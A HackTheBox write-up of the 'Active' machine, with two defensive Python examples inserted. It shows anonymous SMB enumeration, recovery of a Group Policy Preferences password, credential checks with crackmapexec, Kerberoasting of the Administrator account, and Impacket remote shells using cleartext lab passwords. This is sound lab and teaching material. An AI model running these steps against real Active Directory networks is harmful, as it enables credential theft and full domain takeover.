HackTheBox Active Writeup

Shivam Taneja
6 min read · Dec 5, 2022

Active Walkthrough

Active is an easy-rated Windows machine on HackTheBox by eks and mrb3n. A Groups.xml file was found on an anonymously readable SMB share; it contained the AES-encrypted credentials of a domain account, and because the decryption key is public, the password was recovered and turned out to be valid for that account. The Administrator account was kerberoastable, and cracking its TGS hash gave root on the machine.

Nmap

Initial Scan

# Nmap 7.80 scan initiated Sun Jul  4 09:48:35 2022 as: nmap -sC -sV -oN nmap/initial -v 10.10.10.100
Increasing send delay for 10.10.10.100 from 0 to 5 due to 258 out of 858 dropped probes since last increase.
Nmap scan report for 10.10.10.100
Host is up (0.096s latency).
Not shown: 983 closed ports
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-07-04 04:03:53Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   2.02:
|_    Message signing enabled and required
| smb2-time:
|   date: 2022-07-04T04:04:50
|_  start_date: 2022-07-03T18:25:00

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jul  4 09:51:56 2022 -- 1 IP address (1 host up) scanned in 201.76 seconds

  • We can see a lot of open ports.
  • Since DNS (53), Kerberos (88) and LDAP (389) are open, we can assume that the machine is probably an Active Directory domain controller.
  • We also get a domain name, active.htb, which we add to our hosts file.

Checking SMB on Port 445

Is anonymous login enabled?

reddevil@ubuntu:~/Documents/htb/retired/active$ smbclient -N -L 10.10.10.100
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share
        Replication     Disk
        SYSVOL          Disk      Logon server share
        Users           Disk
SMB1 disabled -- no workgroup available

  • Anonymous login is enabled and we can list the shares.
  • Among all of the shares, Replication is not a default one, so let us check whether we have read permission on it.

Checking if Replication share is readable

reddevil@ubuntu:~/Documents/htb/retired/active$ smbclient -N //active.htb/Replication
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \>

We get an SMB shell.

Listing the contents of Replication share

smb: \> dir
  .                                   D        0  Sat Jul 21 16:22:44 2018
  ..                                  D        0  Sat Jul 21 16:22:44 2018
  active.htb                          D        0  Sat Jul 21 16:22:44 2018

                10459647 blocks of size 4096. 5727630 blocks available
smb: \active.htb\> dir
  .                                   D        0  Sat Jul 21 16:22:44 2018
  ..                                  D        0  Sat Jul 21 16:22:44 2018
  DfsrPrivate                       DHS        0  Sat Jul 21 16:22:44 2018
  Policies                            D        0  Sat Jul 21 16:22:44 2018
  scripts                             D        0  Thu Jul 19 00:33:57 2018

                10459647 blocks of size 4096. 5727630 blocks available
smb: \active.htb\>

Listing the file contents recursively

smb: \active.htb\> recurse ON
smb: \active.htb\> dir

First I turn on the recurse option; dir then lists all files and folders recursively.

Among all of the files, Groups.xml looks interesting.

Reading this article, I found that this is a Group Policy Preferences file: it holds the password of a local account that the policy pushes to every machine in the domain it applies to, stored encrypted with AES. Microsoft published the decryption key in its own documentation (the weakness later addressed by MS14-025), which means we can easily decrypt the value and get the password.

Downloading and reading the content

smb: \> get \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 533 as \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml (1.2 KiloBytes/sec) (average 1.2 KiloBytes/sec)

<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}">
    <Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/>
  </User>
</Groups>

  • We get a username and an encrypted password (the cpassword value; the author calls it a hash below).
  • SVC_TGS:edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
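The defender-side counterpart of this finding, as an added example that is not part of the original writeup: a read-only Python audit that walks a copy of SYSVOL and reports every Group Policy Preference item that still carries a cpassword attribute. The file-name-to-account-attribute table and the sample Services.xml are my assumptions; the sample Groups.xml mirrors the file found above.

```python
# Added example, not from the writeup: read-only audit that walks a SYSVOL copy and
# reports GPP items still carrying cpassword. File-name table and Services.xml are assumed.
import os
import tempfile
import xml.etree.ElementTree as ET

# GPP files that can carry cpassword -> attribute naming the affected account.
ACCOUNT_ATTR = {"groups.xml": "userName", "services.xml": "accountName",
                "scheduledtasks.xml": "runAs", "datasources.xml": "username",
                "drives.xml": "username", "printers.xml": "username"}

def scan_gpp_file(path):
    """Return (account, cpassword, never_expires) per element with a cpassword."""
    try:
        root = ET.parse(path).getroot()
    except ET.ParseError:
        return []  # malformed file: skip it rather than abort the sweep
    attr = ACCOUNT_ATTR[os.path.basename(path).lower()]
    hits = []
    for props in root.iter("Properties"):  # cpassword lives on <Properties>
        cpw = props.get("cpassword")
        if cpw:  # a missing or empty cpassword is harmless
            hits.append((props.get(attr, "<unknown>"), cpw, props.get("neverExpires") == "1"))
    return hits

def scan_sysvol(base):
    """Walk a SYSVOL copy; return (path, account, cpassword, never_expires) tuples."""
    findings = []
    for dirpath, _, names in os.walk(base):
        for full in (os.path.join(dirpath, n) for n in names if n.lower() in ACCOUNT_ATTR):
            findings += [(full,) + hit for hit in scan_gpp_file(full)]
    return findings

# Constructed SYSVOL content: Groups.xml mirrors the file found on the box;
# Services.xml is fabricated with an empty cpassword to exercise the benign case.
GROUPS_XML = ('<?xml version="1.0" encoding="utf-8"?><Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">'
    '<User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\\SVC_TGS"><Properties action="U"'
    ' cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"'
    ' neverExpires="1" userName="active.htb\\SVC_TGS"/></User></Groups>')
SERVICES_XML = ('<?xml version="1.0" encoding="utf-8"?><NTServices><NTService name="svc">'
    '<Properties accountName="EXAMPLE\\svc" cpassword=""/></NTService></NTServices>')

def build_sample_sysvol():
    """Write the constructed files under a temp dir laid out like SYSVOL; return its path."""
    base = tempfile.mkdtemp()
    prefs = os.path.join(base, "Policies", "{PLACEHOLDER-GPO-GUID}", "MACHINE", "Preferences")
    for sub, body in (("Groups", GROUPS_XML), ("Services", SERVICES_XML)):
        os.makedirs(os.path.join(prefs, sub))
        with open(os.path.join(prefs, sub, sub + ".xml"), "w", encoding="utf-8") as fh:
            fh.write(body)
    return base
```

Every hit is a preference item that should be deleted and whose account password should be reset, since anyone who can read SYSVOL can recover the plaintext.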

Decrypting the hash

To decrypt it we need the AES key and the IV.

From this repo, I got the key, the IV and the AES mode.

Using CyberChef to decrypt the hash

We get the password for svc_tgs.

Checking if the creds are valid

reddevil@ubuntu:~/Documents/htb/retired/active$ cme smb active.htb -u user -p pass
SMB         10.10.10.100    445    DC               [*] Windows 6.1 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB         10.10.10.100    445    DC               [+] active.htb\svc_tgs:GPPstillStandingStrong2k18

We have valid creds.

Listing the shares

It doesn't look like we can do much with it: we can read a few default shares and the Replication share.

Checking if there are any kerberoastable users

  • Accounts that have a Service Principal Name (SPN) set are kerberoastable; usually these are service accounts.
  • For a kerberoastable account, we can request a TGS for its service. Part of that ticket is encrypted with a key derived from the service account's password (its NTLM hash when the ticket uses RC4), so the ticket can be taken offline and cracked.
  • To request a TGS we only need a valid account on the domain.

Since we have a valid domain account, we can request a TGS for any account that has an SPN set.

There is one such account, and we get its hash back.

Trying to crack the hash using hashcat

And we can see that the hash cracks successfully.
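What this step looks like from the domain controller's side, as an added example that is not part of the original writeup: detection logic over constructed Windows Security events (Event ID 4769, "A Kerberos service ticket was requested"). The field names follow the 4769 event schema; the log lines are fabricated to mirror this box (svc_tgs requesting an RC4 ticket for the Administrator account's SPN).

```python
# Added example, not from the writeup: Kerberoast detection over constructed 4769
# events. Field names follow the 4769 schema; the records themselves are fabricated.
from collections import defaultdict

SAMPLE_EVENTS = """\
TargetUserName=svc_tgs@ACTIVE.HTB ServiceName=Administrator TicketEncryptionType=0x17 Status=0x0
TargetUserName=svc_tgs@ACTIVE.HTB ServiceName=DC$ TicketEncryptionType=0x12 Status=0x0
TargetUserName=DC$@ACTIVE.HTB ServiceName=krbtgt TicketEncryptionType=0x12 Status=0x0
TargetUserName=alice@ACTIVE.HTB ServiceName=DC$ TicketEncryptionType=0x12 Status=0x0
"""
REQUIRED = {"TargetUserName", "ServiceName", "TicketEncryptionType"}

def parse_events(text):
    """Turn key=value lines into dicts, dropping blank or incomplete records."""
    events = []
    for line in text.splitlines():
        fields = dict(tok.split("=", 1) for tok in line.split() if "=" in tok)
        if REQUIRED.issubset(fields):
            events.append(fields)
    return events

def is_roastable_request(ev):
    """RC4 (0x17) ticket for a service run by a user account, not a host or krbtgt.
    Machine accounts end in '$' and normally get AES tickets; a user-account SPN
    served with RC4 is the combination that cracks fastest offline."""
    svc = ev["ServiceName"]
    return (ev["TicketEncryptionType"].lower() == "0x17"
            and not svc.endswith("$") and svc.lower() != "krbtgt")

def kerberoast_alerts(text, threshold=1):
    """Group suspicious requests by requester; report those hitting >= threshold services.
    Raise the threshold in domains where legacy services still only have RC4 keys."""
    by_user = defaultdict(set)
    for ev in parse_events(text):
        if is_roastable_request(ev):
            by_user[ev["TargetUserName"]].add(ev["ServiceName"])
    return {u: sorted(s) for u, s in by_user.items() if len(s) >= threshold}

if __name__ == "__main__":
    for user, services in kerberoast_alerts(SAMPLE_EVENTS).items():
        print(f"ALERT possible Kerberoast: {user} requested RC4 service tickets for {services}")
```

The mitigation for the Administrator account on this box is the usual one: no SPN on a privileged user account, a long random password on any account that must keep one, and AES-only Kerberos keys so RC4 tickets stop being issued at all.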

Testing the account with cme

reddevil@ubuntu:~/Documents/htb/retired/active$ cme smb active.htb -u administrator -p Ticketmaster1968
SMB         10.10.10.100    445    DC               [*] Windows 6.1 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB         10.10.10.100    445    DC               [+] active.htb\administrator:Ticketmaster1968 (Pwn3d!)

  • It says Pwn3d!, which means the account is a local administrator on the host and we can get a shell.
  • We can use wmiexec or smbexec to get a shell.
  • The difference is that smbexec runs commands through a service it creates, so the shell is NT AUTHORITY\SYSTEM, whereas wmiexec runs them as the authenticated user, here active\administrator (the outputs below show both).

Getting a shell as system

reddevil@ubuntu:~/Documents/htb/retired/active$ smbexec.py active.htb/administrator:Ticketmaster1968@10.10.10.100
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>whoami
nt authority\system

Shell as administrator

reddevil@ubuntu:~/Documents/htb/retired/active$ wmiexec.py active.htb/administrator:Ticketmaster1968@10.10.10.100
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

[*] SMBv2.1 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
active\administrator

Reading flags

user.txt

C:\Windows\system32>type c:\users\svc_tgs\desktop\user.txt
86d67*********aa4d10159e983

root.txt

C:\Windows\system32>type c:\users\administrator\desktop\root.txt
b5fc76d**********54d0f708b

Written by Shivam Taneja
IT Security Consultant, Researcher, Penetration Tester & Hacker.
